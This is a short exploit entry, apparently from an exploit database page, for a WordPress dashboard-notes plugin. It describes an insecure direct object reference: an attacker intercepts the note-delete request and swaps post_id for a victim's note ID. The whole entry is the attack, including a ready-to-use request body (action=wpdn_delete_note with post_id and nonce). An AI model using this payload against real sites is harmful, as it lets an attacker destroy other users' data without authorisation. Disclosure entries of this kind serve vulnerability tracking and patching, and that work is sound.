Share
## https://sploitus.com/exploit?id=WPEX-ID:75FBEE63-D622-441F-8675-082907B0B1E6
After attacker create a note, uses the delete option. Intercepts the request and manipulate the post_id= to the victim note.

action=wpdn_delete_note&post_id=<ID-TO-DELETE>&nonce=1aa16d2949